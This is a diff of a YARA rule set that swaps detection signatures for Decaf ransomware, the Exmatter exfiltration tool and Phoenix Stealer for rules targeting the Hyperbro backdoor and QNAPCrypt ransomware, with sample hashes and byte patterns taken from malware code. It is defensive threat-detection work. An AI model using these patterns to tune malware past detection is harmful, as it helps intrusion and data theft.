+		$s3 = { 55 8b ec 6a ff 68 [2] 40 00 68 [2] 40 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 68 53 56 57 89 65 e8 33 db 89 5d fc 6a 02 5f 57 ff 15 [2] 40 00 59 83 0d [2] 41 00 ff 83 0d [2] 41 00 ff ff 15 [2] 40 00 8b 0d [2] 41 00 89 08 ff 15 [2] 40 00 8b 0d [2] 41 00 89 08 a1 [2] 40 00 8b 00 a3 [2] 41 00 e8 ?? 01 00 00 39 1d [3] 00 75 0c 68 [2] 40 00 ff 15 [2] 40 00 59 e8 ?? 01 00 00 68 [3] 00 68 [3] 00 e8 ?? 01 00 00 a1 [2] 41 00 89 45 94 8d 45 94 50 ff 35 [2] 41 00 8d 45 9c 50 8d 45 90 50 8d 45 a0 50 ff 15 [2] 40 00 68 [3] 00 68 00 [2] 00 e8 ?? 01 00 00 83 c4 24 a1 [2] 40 00 8b 30 3b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 15KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize > 150KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Decaf_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT27_Hyperbro_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect Decaf ransomware (unpacked UPX)"
+		description = "Detect Hyperbro backdoor"
 		author = "Arkbird_SOLG"
-		id = "d19b2d31-a6c5-5033-ba43-4e9ccabc37bb"
-		date = "2021-11-01"
-		modified = "2021-11-02"
-		reference = "https://blog.morphisec.com/decaf-ransomware-a-new-golang-threat-makes-its-appearance"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Decaf/RAN_Decaf_Nov_2021_1.yara#L1-L19"
+		id = "060a200e-17dd-5789-94d4-eeff5c2e9a18"
+		date = "2021-05-01"
+		modified = "2021-05-04"
+		reference = "-"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-03/APT27/APT_APT27_Hyperbro_Apr_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "5cea33d710d252b39bcd8ae227f52d10897b7fe58b1ff5226a1cb8cc094d600c"
+		logic_hash = "1a32ab7c30885a665ede66640a9b047e3c381f6f535243fcadf1a7a22e76f407"
 		score = 75
-		quality = 75
+		quality = 35
 		tags = "FILE"
-		hash1 = "088b4715bbe986deac972d551b88f178d43b191f5a71fbd4db3fb0810a233500"
-		hash2 = "5da2a2ebe9959e6ac21683a8950055309eb34544962c02ed564e0deaf83c9477"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "36fad80a5f328f487b20a3f5fc5f1902d50cbb1bd9167c44b66929a1288fc6f4"
+		hash2 = "52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7"
+		hash3 = "9000ce3c0e01b6c80edb3af87aad8117513ce334135aa7d7b1c2afa067f4c4ab"
+		hash4 = "92bbcb5461ab5959e31f997a6df77995377d69f8077e43e5812fcbe9303d831c"
+		tlp = "White"
+		adversary = "APT27"
 
 	strings:
-		$s1 = { 48 8b 05 [3] 00 48 8b 0d [3] 00 48 8d 54 24 ?? 8b 5c 24 ?? 48 8d 74 24 ?? 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 48 89 5c 24 18 48 89 74 24 20 89 f8 48 89 44 24 28 48 c7 44 24 30 00 00 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 38 00 74 ?? 48 8b 54 24 ?? c6 82 e5 00 00 00 00 48 8b 54 24 ?? 31 c0 }
-		$s2 = { 48 8b 05 [3] 00 48 8b 0d [3] 00 48 89 0c 24 48 89 44 24 08 44 0f 11 7c 24 10 48 c7 44 24 20 00 00 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 28 00 74 0a 48 8b 6c 24 ?? 48 83 c4 ?? c3 e8 [3] 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 }
-		$s3 = { 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 89 44 24 50 48 89 5c 24 58 48 83 3d [3] 00 00 75 73 48 8b 05 45 [2] 00 48 8d 0d 66 [2] 00 48 89 04 24 48 89 4c 24 08 48 c7 44 24 10 04 01 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 8b 44 24 18 48 85 c0 0f 84 6a 01 00 00 48 3d 04 01 00 00 0f 87 5e 01 00 00 48 8d 1d 1a [2] 00 c6 04 03 5c 4c 8d 40 01 4c 89 05 [3] 00 48 8b 44 24 50 48 8b 5c }
-		$s4 = { 48 89 44 24 40 c7 44 24 3c 00 00 00 00 48 8b 0d [3] 00 48 8d 54 24 3c 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 18 00 75 10 48 8b 44 24 40 8b 4c 24 68 48 8b 5c 24 60 eb 1d 48 8b 44 24 40 48 8b 5c 24 60 8b 4c 24 68 e8 8f 00 00 00 48 8b 6c 24 48 48 83 c4 50 c3 c7 44 24 38 00 00 00 00 48 8b 15 [3] 00 48 8d 74 24 38 48 89 14 24 48 89 44 24 08 48 89 5c 24 10 48 63 c1 48 89 44 24 18 48 89 74 24 20 48 c7 44 24 28 00 00 00 00 e8 }
-		$s5 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 49 42 43 67 4b 43 41 51 45 41 }
+		$seq1 = { 8b [5] 7? 0? [2] 0? ?? 0? [3] ff 75 0? [11] 5? [2] 0? ?? 8b }
+		$seq2 = { e8 ?? 0? 00 00 b0 01 c3 55 8b ec ff 75 08 ff 15 34 c0 00 10 85 c0 74 11 56 8b 30 50 e8 ?? 1? 00 00 8b c6 59 85 f6 75 f1 5e 5d c3 cc 8b 4c 24 0c 0f b6 44 24 08 8b d7 8b 7c 24 04 85 c9 0f 84 3c 01 00 00 69 c0 01 01 01 01 83 f9 20 0f 8e df 00 00 00 81 f9 80 00 00 00 0f 8c 8b 00 00 00 0f ba 25 b8 27 01 10 01 73 09 f3 aa 8b 44 24 04 8b fa c3 0f ba 25 10 20 01 10 01 0f 83 b2 00 00 00 66 0f 6e c0 66 }
+		$seq3 = { 8b 44 24 08 48 75 [13] be ?? 16 00 10 bb 00 10 00 10 05 [2] 00 00 2b f3 [0-3] 74 0? 8? [0-2] cf [0-4] 03 cb ?? 11 47 3b fe 72 ?? e8 ?? fd ff ff 5f 5e 5b 33 c0 40 c2 0c 00 8b ff 55 8b ec 8b 45 0c 56 57 83 f8 01 75 7c 50 e8 1c 14 00 00 59 85 c0 75 07 33 c0 e9 0e 01 00 00 e8 a6 06 00 00 85 c0 75 07 e8 32 14 00 00 eb e9 e8 af 13 00 00 ff 15 ?? 80 00 10 a3 18 b8 00 10 e8 68 12 00 00 a3 64 ac 00 10 e8 89 0c 00 00 85 c0 7d 07 e8 1f 03 00 00 eb cf e8 93 11 00 00 85 c0 7c 20 e8 12 0f 00 00 85 c0 7c 17 6a 00 e8 41 0a 00 00 59 85 c0 75 0b ff 05 60 ac 00 10 e9 a8 00 00 00 e8 a4 0e 00 00 eb c9 33 ff 3b c7 75 31 39 3d 60 ac 00 10 7e 81 ff 0d 60 ac 00 10 39 3d b4 ac 00 10 75 05 e8 d0 0b 00 00 39 7d 10 75 7b e8 77 0e 00 00 e8 bd 02 00 00 e8 a1 13 00 00 eb 6a 83 f8 02 75 59 e8 78 02 00 00 68 14 02 00 00 6a 01 e8 54 08 00 00 8b f0 59 59 3b f7 0f 84 36 ff ff ff 56 ff 35 00 a0 00 10 ff 35 7c ac 00 10 e8 d3 01 00 00 59 ff d0 85 c0 74 17 57 56 e8 b1 02 00 00 59 59 ff 15 ?? 80 00 10 83 4e 04 ff 89 06 eb 18 56 e8 3f 07 00 00 59 e9 fa fe ff ff 83 f8 03 75 07 57 e8 33 05 00 00 59 33 c0 40 5f 5e 5d c2 0c 00 6a 0c 68 d0 92 00 10 e8 ?? 15 00 00 8b f9 8b f2 8b 5d 08 33 c0 40 89 45 e4 85 f6 75 0c 39 15 60 ac 00 10 0f 84 c5 00 00 00 83 65 fc 00 3b f0 74 05 83 fe 02 75 2e a1 ?? 81 00 10 85 c0 74 08 57 56 53 ff d0 89 45 e4 83 7d e4 00 0f 84 96 00 00 00 57 56 53 e8 72 fe ff ff 89 45 e4 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 400KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and 2 of ( $seq* )
 }
-rule ARKBIRD_SOLG_EXF_Exmatter_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_ELF_Qnapcrypt_Aug_2021_2 : FILE
 {
 	meta:
-		description = "Detect packed Exmatter with Confuser"
+		description = "Detect QNAPCrypt ransomware (x64 version)"
 		author = "Arkbird_SOLG"
-		id = "ddae7776-3202-50e6-b8af-0e5d15373386"
-		date = "2021-11-01"
-		modified = "2021-11-01"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Exmatter/EXF_Exmatter_Nov_2021_1.yara#L1-L22"
+		id = "8cd54646-87da-5261-82f3-68ab96549379"
+		date = "2021-08-11"
+		modified = "2021-08-12"
+		reference = "https://bazaar.abuse.ch/browse/tag/QNAPCrypt/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-11/QNAPCrypt/RAN_ELF_QNAPCrypt_Aug_2021_2.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "67aaac3db488a9e28897047a7498b7a447ec63cdb6da82cb3d4217c7d615f176"
-		score = 50
-		quality = 75
+		logic_hash = "9eb3a499afbaaf2addb8ee12cc2d479ebbacd4d19cc270e995f12e83546008b4"
+		score = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "b6bc126526e27c98a94aab16989864161db1b3a75f18bd5c72bacbdfccad7bd7"
-		hash2 = "8eded48c166f50be5ac33be4b010b09f911ffc155a3ab76821e4febd369d17ef"
-		hash3 = "325ecd90ce19dd8d184ffe7dfb01b0dd02a77e9eabcb587f3738bcfbd3f832a1"
-		level = "Experimental"
+		hash1 = "4829041c64971a0cb37d55e6ba83a57e01e76b26f3f744814b59bedbb3fefce8"
+		hash2 = "50470f94e7d65b50bf00d7416a9634d9e4141c5109a78f5769e4204906ab5f0b"
+		hash3 = "f9f5265f4c748ce0e2171915fb8edb6d967539ac46d624db8eb2586854dd0d9e"
 		tlp = "white"
-		adversary = "RaaS"
+		adversary = "-"
 
 	strings:
-		$s1 = { 45 38 42 44 32 35 45 33 46 35 33 34 39 39 41 43 31 39 42 44 42 34 31 45 37 36 45 38 36 38 39 37 38 39 31 31 42 43 35 41 44 46 37 36 34 33 31 38 33 45 34 38 36 33 38 32 42 44 33 42 42 44 30 30 00 35 41 41 34 30 37 35 37 33 42 34 43 36 45 43 43 41 45 35 36 44 30 46 35 43 34 33 35 34 36 32 33 39 38 43 30 41 46 42 35 33 46 36 44 36 32 33 31 44 38 39 34 44 34 44 31 41 37 46 44 36 45 30 30 00 42 33 39 46 43 34 39 41 36 31 35 36 45 37 31 35 45 38 42 39 37 41 35 30 46 44 34 35 46 45 34 36 38 37 30 37 38 44 42 44 31 45 45 43 46 46 44 39 46 38 35 31 34 30 42 35 33 31 36 45 39 32 31 30 00 44 33 30 39 45 32 43 32 30 31 43 37 35 43 43 30 38 43 35 33 36 42 41 34 30 32 31 45 41 35 37 43 45 42 34 44 30 34 34 39 32 36 30 31 36 46 46 39 39 46 45 44 45 36 31 35 34 36 31 30 41 32 31 30 00 36 43 37 35 38 36 33 43 32 46 39 38 44 37 46 41 45 33 36 45 37 44 46 43 45 38 46 31 39 45 43 39 35 41 46 30 30 43 43 42 33 44 43 39 39 39 31 38 46 42 38 43 30 42 35 38 39 42 30 42 34 35 31 30 }
-		$s2 = { 33 44 33 32 31 41 45 42 34 33 39 35 36 30 34 38 46 35 43 37 35 41 38 42 38 36 36 35 32 34 33 34 44 31 33 31 30 31 31 32 45 37 44 36 42 37 38 46 42 37 35 44 39 33 35 36 31 44 31 31 30 39 38 31 00 34 39 44 38 32 36 38 33 30 42 35 44 39 32 30 34 34 38 46 37 34 42 42 42 45 44 42 33 36 31 46 31 37 43 39 44 44 34 36 31 45 30 44 43 33 44 45 44 31 31 34 45 36 45 31 33 45 30 31 37 33 39 38 31 00 31 45 42 30 38 30 36 38 33 30 39 37 41 32 37 46 42 37 34 33 46 36 32 44 30 38 33 38 44 34 42 41 36 34 33 35 46 44 43 33 38 38 32 41 36 41 36 37 45 46 42 43 32 32 34 45 37 31 42 44 42 43 38 31 00 46 39 45 39 31 44 44 39 44 32 36 32 38 43 43 32 39 32 42 41 43 32 36 35 39 41 35 35 34 34 42 38 42 46 42 30 41 44 31 46 38 31 30 30 43 37 35 45 38 32 44 44 33 42 32 43 45 44 30 35 43 37 39 31 00 45 44 44 31 45 32 34 31 37 36 33 46 34 33 33 35 30 38 37 42 39 38 41 44 30 37 35 38 44 36 39 33 31 39 32 42 37 37 45 44 37 32 41 39 36 43 38 42 33 35 41 45 31 39 34 41 45 38 45 39 31 41 39 31 00 38 43 46 31 34 42 43 33 42 46 39 44 36 31 30 30 43 41 38 41 }
-		$s3 = "SSH_MSG_NEWKEYS" ascii
-		$s4 = { 35 45 46 32 31 35 39 31 38 33 32 30 41 44 38 41 46 41 41 30 32 35 33 35 35 34 36 46 34 34 33 43 38 44 30 39 46 30 41 44 35 31 33 37 45 35 32 30 33 34 32 38 38 43 37 36 39 41 43 36 42 41 44 46 00 44 36 32 45 45 38 34 39 37 41 45 34 39 35 41 33 31 31 34 35 41 37 37 41 35 43 39 44 35 35 37 30 34 43 30 38 38 33 42 30 31 35 46 45 31 41 45 39 46 44 46 46 45 32 30 38 46 31 33 46 41 45 44 46 00 31 35 32 30 33 33 46 38 33 46 37 46 41 36 36 34 35 31 39 33 42 33 32 32 43 43 42 31 36 37 32 46 30 38 39 35 36 42 36 38 43 33 38 44 31 33 32 46 32 32 37 38 46 43 46 30 46 41 30 34 44 46 45 46 00 33 41 33 36 41 46 34 41 46 30 41 31 46 45 35 37 39 35 44 42 39 39 46 41 38 44 33 39 34 46 41 32 44 38 39 30 41 32 32 35 32 38 30 41 38 41 31 35 39 41 43 37 39 46 31 45 34 38 45 45 31 38 46 46 00 44 43 37 42 45 38 33 42 33 45 46 46 38 31 45 38 43 39 45 30 36 46 37 44 37 43 31 46 34 42 44 37 33 34 46 32 30 32 30 41 34 32 34 32 39 45 32 32 41 32 36 31 42 30 45 45 45 31 36 44 31 39 46 46 }
-		$s5 = { 39 38 41 43 30 38 30 44 38 38 37 45 31 34 43 43 39 32 32 44 34 35 37 43 33 42 31 30 35 35 37 31 45 33 36 41 37 35 43 43 39 31 31 42 33 35 46 36 30 43 32 46 35 30 36 44 44 44 45 43 35 43 41 46 00 31 33 46 33 37 31 33 43 30 38 42 33 30 43 45 34 37 36 35 37 33 45 43 31 38 32 39 30 31 32 35 30 45 39 36 42 34 37 37 35 33 31 39 46 34 36 41 38 41 30 30 41 34 46 31 45 42 38 41 43 35 32 42 46 00 43 39 38 39 33 42 41 33 46 43 31 46 41 39 41 37 43 38 37 33 42 32 37 38 37 41 41 41 44 38 38 39 45 33 38 46 30 43 33 39 36 39 45 37 41 32 37 42 30 44 33 37 45 30 41 }
-		$s6 = "SSH_MSG_KEX_DH_GEX_INIT" ascii
+		$s1 = { 52 45 41 44 4d 45 5f 46 4f 52 5f 44 45 43 52 59 50 54 }
+		$s2 = { 64 48 8b 0c 25 f8 ff ff ff 48 8d 44 24 ?? 48 3b 41 10 0f 86 [2] 00 00 48 81 ec ?? 00 00 00 48 89 ac 24 ?? 00 00 00 48 8d ac 24 ?? 00 00 00 48 8b 05 [3] 00 48 83 3d [3] 00 00 0f 86 [2] 00 00 48 8b 48 08 48 8b 00 48 89 04 24 48 89 4c 24 08 e8 [3] ff 48 c7 04 24 20 00 00 00 e8 [2] 00 00 48 c7 04 24 00 00 00 00 e8 [3] ff 48 8b 44 24 20 48 89 44 24 58 48 8b 4c 24 18 48 89 8c 24 88 00 00 00 48 8b 54 24 28 48 89 54 24 60 48 }
+		$s3 = { 48 81 ec ?? 00 00 00 48 89 ac 24 ?? 00 00 00 48 8d ac 24 ?? 00 00 00 }
+		$s4 = { 64 48 8b 0c 25 f8 ff ff ff 48 [0-5] 3b ?? 10 0f 86 [2] 00 00 48 ?? ec }
+		$s5 = { 48 83 ec 78 48 89 6c 24 70 48 8d 6c 24 70 48 8b 05 [3] 00 48 8b 0d [3] 00 48 8b 15 [3] 00 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 e8 [3] ff 48 8b 44 24 18 48 85 c0 0f 84 10 01 00 00 48 8b 48 28 48 8b 50 20 48 8b 40 18 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 e8 [3] ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 8b 5c 24 30 48 85 d2 0f 85 a3 00 00 00 48 8d 15 [2] 03 00 48 39 d0 0f 85 13 01 00 00 48 8b 05 [3] 00 48 8b 15 [3] 00 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 48 8b 84 24 80 00 00 00 48 89 44 24 18 48 8b 84 24 88 00 00 00 48 89 44 24 20 48 8b 84 24 90 00 00 00 48 89 44 24 28 e8 [3] ff 48 8b 44 24 38 48 8b 4c 24 40 48 8b 54 24 48 48 8b 5c 24 50 48 8b 74 24 30 48 89 b4 24 98 00 00 00 48 89 84 24 a0 00 00 00 48 89 8c 24 a8 00 00 00 48 89 94 24 b0 00 00 00 48 89 9c 24 b8 00 00 00 48 8b 6c 24 }
+		$s6 = { 48 81 ec 48 01 00 00 48 89 ac 24 40 01 00 00 48 8d ac 24 40 01 00 00 48 8d 7c 24 38 48 8d 35 [2] 0f 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 [3] ff 48 8b 6d 00 48 8d 05 [2] 02 00 48 89 04 24 48 8b 84 24 50 01 00 00 48 89 44 24 08 48 89 44 24 10 e8 [3] ff 48 8b 44 24 18 48 89 84 24 38 01 00 00 31 c9 eb 18 8b 54 84 38 48 8b 5c 24 30 48 8b 84 24 38 01 00 00 89 14 98 48 8d 4b 01 48 8b 94 24 50 01 00 00 48 39 d1 7d 2c 48 89 4c 24 30 90 48 8b 05 [3] 00 48 89 04 24 48 c7 44 24 08 40 00 00 00 e8 [3] ff 48 8b 44 24 10 48 83 f8 40 72 b1 eb 46 48 c7 04 24 00 00 00 00 48 89 44 24 08 48 89 54 24 10 48 89 54 24 18 e8 [3] ff 48 8b 44 24 28 48 8b 4c 24 20 48 89 8c 24 58 01 00 00 48 89 84 24 60 01 00 00 48 8b ac 24 40 01 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 600KB and 5 of them
+		uint32( 0 ) == 0x464C457F and filesize > 25KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Phoenix_Stealer_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_ELF_Qnapcrypt_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect the Phoenix Stealer"
+		description = "Detect QNAPCrypt ransomware (x86 version)"
 		author = "Arkbird_SOLG"
-		id = "8c9df216-cbfe-51f3-a6d7-cfeb99fafbe0"
-		date = "2021-11-01"
-		modified = "2021-11-01"
-		reference = "https://twitter.com/3xp0rtblog/status/1455111070566207493/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Phoenix_Stealer/MAL_Phoenix_Stealer_Jun_2021_1.yara#L1-L20"
+		id = "fcdec43a-de70-57a2-9527-263685acc820"
+		date = "2021-08-11"
+		modified = "2021-08-12"
+		reference = "https://bazaar.abuse.ch/browse/tag/QNAPCrypt/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-11/QNAPCrypt/RAN_ELF_QNAPCrypt_Aug_2021_1.yara#L1-L29"
 		license_url = "N/A"
-		logic_hash = "989c2518a42201559265ce4b974b35df5c4b8365e53f789fc124ee969e747c87"
+		logic_hash = "4dbe5241b9f1b68a15193f3d5c7b0b5fac80208c16917b6e543ce407301f1dcf"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		hash1 = "5bbfeee67b9b087ed228eccdacd4a7e71d40f7f96ad869903e02d9c3b02adbe5"
-		hash2 = "34f78f4028c51f6340c1f4846b65252fa6686ba0a5ab8ebc35c737a8960ba43e"
-		hash3 = "e51de8c43034fafaa49f81e9cc955c0cf60dc9684f28d8c355baf0724710de1f"
-		tlp = "White"
+		hash1 = "551e03e17d1df9bd5b712bec7763578c01e7bffe9b93db246e36ec0a174f7467"
+		hash2 = "670250a169ba548c07a5066a70087e83bbc7fd468ef46199d76f97f9e7f72f36"
+		hash3 = "6df0897d4eb0826c47850968708143ecb9b58a0f3453caa615c0f62396ef816b"
+		hash4 = "fedcce505a5e307c1d116d52b3122f6484b3d25fb3c4d666fe7af087cfe85349"
+		tlp = "white"
 		adversary = "-"
 
 	strings:
-		$s1 = { 6a 16 58 0f be c8 88 85 b0 fe ff ff c7 85 d8 fe ff ff 42 73 7a 73 c7 85 dc fe ff ff 71 64 77 7b c7 85 e0 fe ff ff 38 73 6e 73 c6 85 e4 fe ff ff 00 e8 aa 73 ff ff 89 85 94 }
-		$s2 = "UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s" ascii
-		$s3 = { b8 c9 11 47 00 e8 c3 c5 01 00 68 f8 d7 47 00 33 db 53 53 ff 15 cc 20 47 00 53 50 89 85 d0 fc ff ff ff 15 d0 20 47 00 85 c0 0f 85 92 02 00 00 6a 01 ff 15 8c 22 47 00 84 c0 79 f4 53 e8 e2 aa 00 00 50 e8 1e 98 00 00 8b 35 84 22 47 00 8d 85 ec fe ff ff 59 59 50 53 53 6a 1c 53 ff d6 8d 8d ec fe ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 ec fe ff ff 51 50 b9 f0 5b 48 00 e8 bf 0e 00 00 8d 85 e8 fd ff ff 50 68 04 01 00 00 ff 15 40 20 47 00 8d 8d e8 fd ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 e8 fd ff ff 51 50 b9 08 5c 48 00 e8 89 0e 00 00 8d 85 e4 fc ff ff 50 53 53 6a 1a 53 ff d6 8d 8d e4 fc ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 e4 fc ff ff 51 50 b9 90 5b 48 00 e8 57 0e 00 00 8b fb 89 9d dc fc ff ff 8b f3 89 bd d4 fc ff ff 89 b5 d8 fc ff ff 83 65 fc 00 33 c9 6a 16 5a 41 e8 71 05 ff ff 8b cf 89 85 e0 fc }
-		$s4 = { 6a 01 ff 15 98 22 47 00 85 c0 74 5d 6a 00 ff 15 a0 22 47 00 85 c0 74 51 56 6a 01 ff 15 94 22 47 00 8b f0 85 f6 74 3b 56 ff 15 38 21 47 00 8b d0 85 d2 74 27 8b ca 57 8d 79 01 8a 01 41 84 c0 75 f9 2b cf 6a 03 51 8b 0d 6c 72 48 00 52 ba 58 d7 47 00 e8 95 1b fe ff 83 c4 0c 5f 56 ff 15 64 21 47 00 }
-		$s5 = { 81 ec 14 02 00 00 a1 0c 50 48 00 33 c5 89 45 fc 53 56 8b d9 be 19 27 00 00 57 8b 7d 0c 83 fb ff 75 0c e8 bb eb ff ff 89 37 89 47 04 eb 17 ff 75 08 52 53 ff 15 bc 22 47 00 85 c0 8b cf 0f 95 c2 e8 b8 fe ff ff e8 98 eb ff ff 8b 4f 04 8b 49 04 3b 48 04 75 08 81 3f 34 27 00 00 74 20 e8 80 eb ff ff 8b 4f 04 8b 49 04 3b 48 04 0f 85 b9 00 00 00 81 3f 33 27 00 00 0f 85 ad 00 00 00 83 fb ff 75 0c e8 5b eb ff ff 89 37 e9 99 00 00 00 33 c0 89 9d f8 fd ff ff 40 89 9d fc fe ff ff 89 85 f4 fd ff ff 89 85 f8 fe ff ff 8d 85 f8 fe ff ff 6a 00 50 8d 85 f4 fd ff ff 50 6a 00 8d 43 01 50 ff 15 d8 22 47 00 8b f0 8b cf 85 f6 0f 98 c2 e8 2a fe ff ff 85 f6 78 53 83 a5 f0 fd ff ff 00 8d 85 ec fd ff ff 50 8d 85 f0 fd ff ff c7 85 ec fd ff ff 04 00 00 00 50 68 07 10 00 00 68 ff ff 00 00 53 ff 15 b0 22 47 00 8b f0 8b cf 85 f6 0f 95 c2 e8 e8 fd ff }
+		$s1 = { 2d 00 20 00 20 00 00 00 80 00 80 08 00 00 00 00 00 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 25 00 05 }
+		$s2 = { 2d 2d 2d 2d 2d 45 4e 44 20 00 00 00 00 00 00 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 }
+		$s3 = { 52 65 71 75 69 72 65 64 55 73 65 72 2d 41 67 65 6e 74 3a 20 25 73 0d 0a 57 77 77 2d 41 75 74 68 65 6e 74 69 63 61 74 65 5a 61 6e 61 62 61 7a 61 72 5f 53 71 75 61 72 65 0a 72 75 6e 74 69 6d 65 20 73 74 61 63 6b 3a }
+		$s4 = { 34 10 90 e5 80 20 9f e5 04 20 8d e5 08 10 8d e5 c8 10 9f e5 0c 10 8d e5 0a 30 a0 e3 10 30 8d e5 53 4e f8 eb 14 00 9d e5 00 10 90 e5 04 00 90 e5 00 00 50 e3 0c 00 00 da 04 00 91 e5 00 10 91 e5 04 10 8d e5 08 00 8d e5 94 00 9f e5 0c 00 8d e5 05 00 a0 e3 10 00 8d e5 15 e2 ff eb 14 00 dd e5 01 10 20 e2 84 00 9d e5 09 fe ff ea 00 00 a0 e3 00 10 a0 e3 f1 ff ff ea 0e 30 a0 e1 56 76 f9 eb fa }
+		$s5 = { 89 7c 24 2c 83 fe 20 19 db 89 f1 bf 01 00 00 00 d3 e7 21 df 89 fb 83 c7 ff 89 7c 24 24 83 c1 e0 89 4c 24 3c 83 f9 20 19 f6 f7 d9 89 4c 24 38 83 f9 20 19 ff 8b 4c 24 3c ba 01 00 00 00 d3 e2 21 f2 8b 4c 24 38 be 01 00 00 00 d3 ee 21 fe 09 d6 83 c3 ff 83 d6 ff 89 74 24 34 8b 54 24 44 8b 5c 24 2c 8b 7c 24 40 8b 4c 24 28 89 44 24 48 31 c0 89 44 24 30 31 c0 89 44 24 20 31 c0 89 44 24 1c }
+		$s6 = { 65 8b 0d 00 00 00 00 8b 89 fc ff ff ff 3b 61 08 0f 86 44 03 00 00 83 ec 58 c7 44 24 20 00 00 00 00 c7 44 24 24 00 00 00 00 8d 05 60 c3 27 08 89 44 24 20 8d 0d 28 af 31 08 89 4c 24 24 8b 0d 4c 35 4c 08 8d 15 50 e8 31 08 89 14 24 89 4c 24 04 8d 4c 24 20 89 4c 24 08 c7 44 24 0c 01 00 00 00 c7 44 24 10 01 00 00 00 e8 63 b9 ea ff 90 c7 05 94 38 4c 08 06 00 00 00 8b 05 d0 50 4d 08 85 c0 0f 85 b3 02 00 00 8d 05 1a d3 2b 08 89 05 90 38 4c 08 8b 05 a4 34 4c 08 89 04 24 8d 05 10 02 32 08 89 44 24 04 8d 05 90 38 4c 08 89 44 24 08 }
+		$x1 = { e8 [2] e4 ff 8b 44 24 08 89 44 24 28 8b 4c 24 0c 89 4c 24 2c 31 d2 31 db eb 18 8b 6c 24 40 83 c5 01 8b 54 24 44 83 d2 00 8b 44 24 28 8b 4c 24 2c 89 eb 39 ca 87 dd 0f ?? c3 87 dd }
+		$x2 = { 8b ?? 20 89 ?? 24 ff d0 8b 44 24 ?? 89 44 24 ?? 8b 4c 24 ?? 89 4c 24 ?? c7 44 24 68 65 43 68 30 c7 44 24 6c 72 61 69 78 89 ?? 24 89 ?? 24 04 e8 [2] e4 ff }
+		$x3 = { 74 11 90 e5 70 21 90 e5 68 31 90 e5 6c 41 90 e5 04 30 8d e5 08 40 8d e5 0c 20 8d e5 10 10 8d e5 91 5c fe eb 1c 00 9d e5 18 10 9d e5 14 30 9d e5 78 20 9d e5 40 10 82 e5 44 00 82 e5 ac b6 9f e5 00 00 9b e5 00 00 50 e3 27 06 00 1a 3c 30 82 e5 7c 02 9d e5 20 10 80 e2 1b 2e 8d e2 f9 0d fc eb 04 20 8d e2 1b 1e 8d e2 f6 0d fc eb 9e f4 ff eb 34 00 9d e5 78 30 9d e5 48 00 83 e5 7c 02 9d e5 d4 40 90 e5 d0 50 90 e5 cc 60 90 e5 04 60 8d e5 08 50 8d e5 0c 40 8d e5 fe f5 ff eb 10 00 9d e5 78 30 9d e5 4c 00 83 e5 04 00 8d e5 7c 02 9d e5 c0 40 80 e2 08 40 8d e5 8c fa ff eb 0c 00 9d e5 18 30 9d e5 10 40 9d e5 14 50 9d e5 78 60 9d e5 50 00 86 e5 14 b6 9f e5 00 00 9b e5 00 }
